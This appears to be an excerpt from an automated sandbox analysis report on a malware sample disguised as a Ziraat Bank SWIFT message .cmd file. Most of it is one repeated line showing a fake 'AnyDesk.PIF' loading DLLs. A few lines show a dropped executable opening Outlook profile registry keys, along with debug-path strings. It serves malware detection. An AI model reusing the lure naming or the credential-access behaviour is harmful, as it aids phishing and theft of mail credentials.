                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdStatic file information: File size 3418572 > 1048576
                      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000001D.00000003.2479887474.0000000000650000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000001D.00000003.2580817829.0000000000620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2598730489.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2579062872.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000001D.00000003.2166396626.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000001D.00000003.2166396626.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000001D.00000003.2195638183.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000001D.00000003.2690766843.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb source: Native_neworigin.exe, 0000001B.00000002.1714513945.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1443226587.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1767484584.000000000401D000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1781352411.00000000052D0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000001D.00000003.2083482558.0000000000410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: FXSSVC.pdb source: Native_neworigin.exe, 0000001B.00000003.1644259863.0000000005330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000001D.00000003.2650684922.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000001D.00000003.2517364614.0000000000400000.00000004.00001000.00020000.00000000.sdmp
